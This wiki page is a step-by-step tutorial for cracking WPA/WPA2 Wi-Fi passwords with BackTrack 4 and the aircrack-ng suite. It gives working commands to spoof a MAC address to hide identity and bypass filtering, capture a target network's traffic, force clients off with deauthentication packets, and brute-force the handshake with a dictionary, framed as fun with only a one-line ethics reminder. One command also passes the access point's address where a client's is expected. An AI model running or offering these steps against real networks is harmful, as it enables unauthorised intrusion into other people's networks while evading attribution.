Crack WPA/WPA2 with BT4

From TomSchaefer.org Wiki

Jump to: navigation, search

Flash Vid
Please be ethical with knowledge

Cracking Wireless is fun. Its like a slap in the face to everyone who thinks wireless is safe. Hiding your SSID, MAC Filtering, and other tweaks will not keep you safe. 

   # ifconfig –a

find your WLAN if 

   # airmon-ng stop <Wireless if>

   # ifconfig <Wireless if> down

   # macchanger --mac <mac to use in the xx:xx:xx:xx:xx:xx form>

We change our MAC to hide our identity and if we want to bypass MAC filtering 

   # airodump-ng <wireless if>

This will discover APs in the area. Its a really neat powerful tool, play with it a little. 

   # airodump-ng -–channel <channel> –w <file> -–bssid <ssid in the form of XX:XX:XX:XX:XX:XX> <wireless if>

This will capture packets to a file you specify for a specific ssid on a specific channel

In a new shell… 

   aireplay-ng –0 10 –a <AP MAC> –c <AP MAC> <wireless if>

Wait for the ACK packets. This will only work if there are active hosts on the AP.

Now crack the dump with a brute force attack 

   aircrack-ng <file> –w <dict file>

If you need a dict file there is an existing one in /pentest/wireless/cowpatty/dict

Retrieved from "http://www.tomschaefer.org/wiki/index.php/Crack_WPA/WPA2_with_BT4"
Personal tools